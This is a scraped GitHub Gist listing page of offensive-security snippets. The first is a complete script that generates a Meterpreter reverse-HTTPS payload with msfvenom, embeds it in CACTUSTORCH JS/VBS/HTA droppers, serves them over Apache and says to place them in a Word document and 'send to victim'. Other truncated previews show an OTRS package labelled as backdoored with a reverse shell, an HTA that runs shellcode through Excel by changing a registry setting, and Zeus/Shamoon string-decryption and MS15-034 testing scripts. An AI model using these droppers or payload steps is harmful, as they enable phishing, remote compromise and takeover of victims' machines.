Skip to content

Instantly share code, notes, and snippets.

git clone && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
Kaicastledine / MyPackage.opm
Created September 2, 2017 15:08 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Vendor>My Module</Vendor>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
Kaicastledine / CalcExcel.hta
Created July 24, 2017 09:59
Shellcode Execution Via HTA
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
Kaicastledine / CalcExcel.hta
Created July 24, 2017 09:59
Shellcode Execution Via HTA
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
Kaicastledine / CalcExcel.hta
Created July 24, 2017 09:59
Shellcode Execution Via HTA
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%%
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%%
arparp : LOCAL : python windows/ -args " %%cmd_args%% " -project Ops
arparp : ANY_REMOTE : python windows/ -args " %%cmd_args%% " -project Ops
channels : LOCAL : commands %%cmd_args%%
channels : ANY_REMOTE : commands %%cmd_args%%
checkpsp : LOCAL : python windows/ -args " %%cmd_args%% " -project Ops
checkpsp : ANY_REMOTE : python windows/ -args " %%cmd_args%% " -project Ops
#!/usr/bin/env python
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
def decrypt(func):
Decryption of zeus strings
data = {}
import idc
def decrypt_n_comment(func, func_name):
Decrypt and comment Shamoon2's strings
data = {}
for xref in XrefsTo(LocByName(func_name)):
# init
Kaicastledine / MS15-034Tester.ps1
Created January 25, 2017 11:20 — forked from Zagrophyte/MS15-034Tester.ps1
Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
function TestMS15_034($hostname, $port)
if ($port -eq $null)
$port = 80
$tc = New-Object Net.Sockets.TcpClient